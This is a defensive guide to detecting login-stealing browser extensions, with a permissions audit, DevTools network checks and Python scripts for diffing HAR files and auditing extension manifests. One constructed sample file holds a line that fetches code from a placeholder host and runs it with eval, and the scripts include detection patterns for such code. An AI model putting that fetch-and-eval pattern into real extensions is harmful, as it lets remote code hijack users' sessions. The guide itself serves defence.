How to Detect a Malicious Browser Extension Stealing Bank Logins

You install a browser extension that promises to save you money on checkout. Two weeks later, your bank calls about a login from a device in another country. The two events feel unrelated. They almost never are.

Malicious browser extensions are one of the most underrated threats in personal and corporate security. A 2023 study by Stanford and CISPA researchers cataloged more than 280 million installs of policy-violating or outright malicious Chrome extensions across three years. Many of those extensions started life as legitimate tools with thousands of good reviews, then quietly turned hostile after an "update" or an ownership change. The extension in your toolbar today is not guaranteed to be the same code you approved last month.

This guide walks you through malicious browser extension detection from the ground up: how login-stealing extensions actually work, the exact browser tools you use to catch them, a repeatable audit you can run in fifteen minutes, and how to compare detection approaches. By the end you will be able to look at any extension and decide whether it belongs anywhere near your banking session.

Key Takeaways
  • Extensions that request <all_urls> or "Read and change all your data on all websites" can read every form field, including passwords and OTPs.
  • The biggest risk is the silent update: a trusted extension gets sold or hijacked, then ships malicious code to existing users.
  • You can audit any extension in about 15 minutes using built-in browser pages, the network tab, and the extension's manifest.
  • Watch for unexplained outbound requests to unfamiliar domains, especially during login, checkout, and password-reset flows.
  • Use a dedicated browser profile (or separate browser) for banking with zero extensions installed.
  • Layered defense beats any single check. Combine browser hardening, endpoint protection, and site-level protection for accounts you control.

How a Malicious Browser Extension Steals Bank Logins

Browser extensions run inside the same page you do. That is the whole point of them, and also the whole problem. When an extension has permission to read a page, it can read everything on that page, including the value you just typed into a password box before you hit submit.

Here is the typical attack chain, step by step:

  1. Broad permission grant. The extension requests access to all sites. Most users click through the permission dialog without reading it.
  2. Content script injection. The extension injects JavaScript into every page you load. This script can attach listeners to form fields.
  3. Credential capture. When you type into a login form, a keystroke or input event handler records the value. On submit, it grabs the complete username and password pair.
  4. Session and cookie theft. With the right permissions, the extension reads authentication cookies and session tokens, which lets an attacker skip the password entirely.
  5. Exfiltration. The captured data is sent to a remote server, often disguised as an analytics or "telemetry" call to a domain that looks boring on purpose.

The scariest variant does not steal the password at all. It waits until you are logged in, then quietly initiates transactions inside your authenticated session. Since the request comes from your own browser with your own cookies, the bank sees a legitimate user. This is why two-factor authentication alone will not save you: the extension is already inside the fence.

Why "trusted" extensions turn hostile

Most login-stealing extensions were not malicious on day one. Three patterns dominate:

  • Acquisition. A developer with a popular free extension sells it. The buyer pushes a malicious update to the existing install base.
  • Compromised developer account. Attackers phish the developer, then publish an update through the legitimate account.
  • Dependency poisoning. The extension loads remote code or a third-party library that later gets compromised.

This is closely related to the supply-chain risks we cover in how to lock down AI agent browsers before extensions hijack them, where automated browsing agents multiply the blast radius of a single bad extension.

Warning Signs of a Malicious Browser Extension

Before you open a single developer tool, a fast behavioral check catches many bad actors. Any one of these is a yellow flag. Two or more is a red flag.

  • New tabs, redirects, or injected ads that started appearing after you installed something.
  • Your homepage or default search engine changed without your action.
  • The extension asks for far more access than its job requires. A unit converter does not need to read all your websites.
  • Sluggish page loads on sites that used to be fast, because a content script runs on every page.
  • The extension name or icon changed after an update, a common sign of ownership transfer.
  • Reviews mention "it was great until the last update," which is the single most reliable public warning.
  • Login prompts that look slightly off on banking sites, since some extensions overlay fake forms.

The permission review is the highest-value five seconds you can spend. In Chrome and Edge, go to chrome://extensions, click Details, and read the "Permissions" and "Site access" sections. "Read and change all your data on all websites" is the phrase that should make you stop and ask why.

A 15-Minute Malicious Browser Extension Detection Audit

This is the repeatable process I run on any machine that touches money. It uses only built-in browser features, no paid scanner required.

Step 1: Inventory every installed extension (3 minutes)

  1. Chrome/Edge/Brave: open chrome://extensions. Firefox: about:addons.
  2. List every extension. Be ruthless about anything you do not actively use.
  3. For each one, note the developer, the last update date, and whether you remember installing it.

Say you have 23 extensions installed. In practice, most people actively use 4 or 5. That means 18 extensions are sitting there with page-read permissions for no reason. Removing unused extensions is the fastest risk reduction available to you.

Step 2: Review permissions against purpose (3 minutes)

Open each extension's details and compare what it can do against what it should need. A screenshot tool needs the active tab. A password manager legitimately needs broad access. A "coupon finder" that reads all sites and runs on startup deserves scrutiny.

Step 3: Watch the network during a login (5 minutes)

This is the step that separates guesswork from evidence.

  1. Open a non-sensitive test login page (create a throwaway account somewhere, never use your real bank for the test).
  2. Press F12 to open DevTools and switch to the Network tab.
  3. Check "Preserve log" so requests are not cleared on navigation.
  4. Type a fake password and submit. Watch every outbound request.
  5. Any request to a domain you do not recognize, fired at the moment of submit, is a serious red flag. Legitimate logins talk to the site's own domain and its known auth provider.

To attribute traffic specifically to extensions, open a fresh profile with no extensions and repeat the same login. Compare the request lists. Any domain that appears only in your normal profile is coming from an extension or other injected code.
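To make that profile comparison repeatable, save the Network tab from each run as a HAR file (DevTools offers "Save all as HAR") and diff the hostnames. The script below is an added example, not code from this article: the two HAR logs embedded in it are constructed samples trimmed to the fields the check reads, and every hostname in them is a placeholder. It reports the hosts that only the extension-laden profile contacted, and separately the ones hit within a couple of seconds of the login POST, which is the "unknown domain at the moment of submit" signal Step 3 describes.

```python
from datetime import datetime
from urllib.parse import urlsplit

# Constructed HAR logs (DevTools Network tab, "Save all as HAR"), trimmed to the
# fields this check reads. In practice: json.load(open("run.har")). Hosts are placeholders.
CLEAN_PROFILE_HAR = {"log": {"entries": [
    {"startedDateTime": "2024-01-01T10:00:00.000Z", "request": {"method": "GET", "url": "https://login.example-test.com/"}},
    {"startedDateTime": "2024-01-01T10:00:05.000Z", "request": {"method": "POST", "url": "https://login.example-test.com/session"}},
    {"startedDateTime": "2024-01-01T10:00:05.100Z", "request": {"method": "GET", "url": "https://auth.example-idp.com/token"}},
]}}
NORMAL_PROFILE_HAR = {"log": {"entries": [
    {"startedDateTime": "2024-01-01T10:05:00.000Z", "request": {"method": "GET", "url": "https://login.example-test.com/"}},
    {"startedDateTime": "2024-01-01T10:05:04.900Z", "request": {"method": "POST", "url": "https://login.example-test.com/session"}},
    {"startedDateTime": "2024-01-01T10:05:05.000Z", "request": {"method": "GET", "url": "https://auth.example-idp.com/token"}},
    # Unknown host contacted 150 ms after the login POST: the pattern Step 3 warns about.
    {"startedDateTime": "2024-01-01T10:05:05.050Z", "request": {"method": "POST", "url": "https://metrics-placeholder.invalid/collect"}},
    # Unknown host, but 25 s later: worth a look, yet not tied to the submit.
    {"startedDateTime": "2024-01-01T10:05:30.000Z", "request": {"method": "GET", "url": "https://fonts-placeholder.invalid/a.woff"}},
]}}

def _host(entry):
    return urlsplit(entry["request"]["url"]).hostname

def _time(entry):
    # HAR timestamps are ISO 8601 with a trailing Z; fromisoformat() wants an explicit offset
    return datetime.fromisoformat(entry["startedDateTime"].replace("Z", "+00:00"))

def hosts_in_har(har):
    """Every hostname contacted in a HAR log."""
    return {_host(e) for e in har["log"]["entries"]}

def extension_only_hosts(clean_har, normal_har):
    """Hosts seen only in the extension-laden profile; the page itself never contacted them."""
    return sorted(hosts_in_har(normal_har) - hosts_in_har(clean_har))

def requests_at_submit(clean_har, normal_har, login_host, window_s=2.0):
    """Requests to non-baseline hosts fired within window_s of a POST to login_host."""
    baseline = hosts_in_har(clean_har)
    entries = normal_har["log"]["entries"]
    submits = [_time(e) for e in entries
               if e["request"]["method"] == "POST" and _host(e) == login_host]
    flagged = []
    for e in entries:
        if _host(e) in baseline:
            continue
        if any(abs((_time(e) - s).total_seconds()) <= window_s for s in submits):
            flagged.append((_host(e), e["request"]["url"]))
    return flagged
```

Run `requests_at_submit(clean, normal, "login.example-test.com")` on your own two exports; anything it returns deserves the same treatment as an unexplained domain in the live Network tab.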

Step 4: Inspect the extension's files (2 minutes)

Extensions are just folders of code. On Chrome, extensions live under your profile directory in an Extensions folder, each named by its ID. Open the manifest.json and look at:

  • permissions and host_permissions: what it can touch.
  • content_scripts: which pages it injects into. "matches": ["<all_urls>"] means everywhere.
  • background service worker: what runs even when you are not clicking the extension.

If you find references to remote script loading or obfuscated, minified code that does not match the extension's simple purpose, remove it. If you work with symbolic links to keep extension folders organized for analysis across drives, a tool like Windows Symlink Creator Pro makes that housekeeping painless on Windows.
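The manifest checks above can be scripted. The following is an added example, not code from this article or from any real extension: it flags broad host access, sensitive permissions, content scripts matched to every page, background code, and JS files that reference remote URLs or eval-style execution. The manifest and file contents embedded here are constructed samples modelled on the "coupon finder" case from Step 2; in practice you would json.load() the manifest and read the .js files from the extension's folder under your profile's Extensions directory.

```python
import re

# Constructed manifest.json in the MV3 layout, mirroring the "coupon finder that reads
# all sites and runs on startup" case from Step 2. Nothing here is a real extension.
SAMPLE_MANIFEST = {
    "manifest_version": 3, "name": "Coupon Finder (constructed sample)", "version": "2.4.0",
    "permissions": ["storage", "cookies", "webRequest", "tabs"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"], "run_at": "document_start"}],
    "background": {"service_worker": "bg.js"},
}
# Constructed contents of the extension's JS files (in practice, read them from the folder).
SAMPLE_FILES = {
    "content.js": 'const u = "https://update-placeholder.invalid/p.js";\n'
                  "fetch(u).then(r => r.text()).then(code => eval(code));\n",
    "bg.js": "chrome.runtime.onInstalled.addListener(() => {});\n",
}

# Match patterns that grant access to every site (MV2 lists them under "permissions", MV3 under "host_permissions").
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Permissions that let an extension read cookies or traffic, or run code beyond a content script.
SENSITIVE = {"cookies", "webRequest", "webRequestBlocking", "debugger", "nativeMessaging",
             "proxy", "clipboardRead", "history", "scripting"}
# Remote URLs or dynamic code execution inside the extension's own JS.
REMOTE_CODE = re.compile(r"\beval\(|new Function\(|\bimport\(|https?://[^\s\"']+")

def audit_manifest(m):
    """Return the Step 4 findings for one manifest as human-readable strings."""
    findings = []
    hosts = (set(m.get("host_permissions", [])) | set(m.get("permissions", []))) & BROAD_HOSTS
    if hosts:
        findings.append("host access: all sites (" + ", ".join(sorted(hosts)) + ")")
    perms = set(m.get("permissions", [])) & SENSITIVE
    if perms:
        findings.append("sensitive permissions: " + ", ".join(sorted(perms)))
    for cs in m.get("content_scripts", []):
        if set(cs.get("matches", [])) & BROAD_HOSTS:
            findings.append("content script on every page: " + ", ".join(cs.get("js", [])))
    bg = m.get("background", {})
    if bg.get("service_worker") or bg.get("scripts"):
        findings.append("background code: " + (bg.get("service_worker") or ", ".join(bg["scripts"])))
    return findings

def audit_files(files):
    """Map each JS file name to the remote-URL / eval-style strings found in it."""
    flagged = {}
    for name, src in files.items():
        hits = sorted(set(REMOTE_CODE.findall(src)))
        if hits:
            flagged[name] = hits
    return flagged
```

A password manager will legitimately trip the host-access and content-script checks, so read the findings against the extension's stated purpose rather than treating any hit as proof.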

Built-in Tools vs Dedicated Scanners: What Actually Catches It

People often ask whether they need a paid extension scanner. The honest answer is that layered detection works better than any single product. Here is how the main approaches compare.

| Method | Catches silent updates? | Detects exfiltration? | Skill required | Cost |
| --- | --- | --- | --- | --- |
| Manual permission review | Partial | No | Low | Free |
| DevTools network analysis | Yes | Yes | Medium | Free |
| Endpoint antivirus / EDR | Sometimes | Sometimes | Low | Paid |
| Enterprise extension allowlist | Yes | Indirect | High | Paid |
| Dedicated browser profile (no extensions) | Yes (avoids entirely) | N/A | Low | Free |

The clear winner for banking is the last row: a clean, extension-free profile used only for financial sites. It is free, requires no expertise, and sidesteps the entire threat class. Everything else is for the sites you cannot fully isolate.

A Before-and-After Scenario Worth Copying

Let me make this concrete with a realistic setup and how a five-minute change reduces exposure.

Before. Priya runs a small e-commerce shop. She uses one Chrome profile for everything: her business bank, her payment processor, her supplier accounts, plus 19 extensions accumulated over three years. Six of those extensions can read and change data on all sites. Her attack surface for a single compromised extension covers all 8 of her sensitive logins.

After. She creates two profiles. Profile A has zero extensions and is used only for banking and payments. Profile B keeps her productivity extensions for everyday browsing. Now, even if one of her 19 extensions turns malicious, it never sees a banking session. Her exposed sensitive logins drop from 8 to 0. Time invested: about 6 minutes.

Cover image: Wikipedia Reading Lists - Chrome screenshot 1 by RHo (WMF), licensed under BY-SA 4.0 via Openverse.
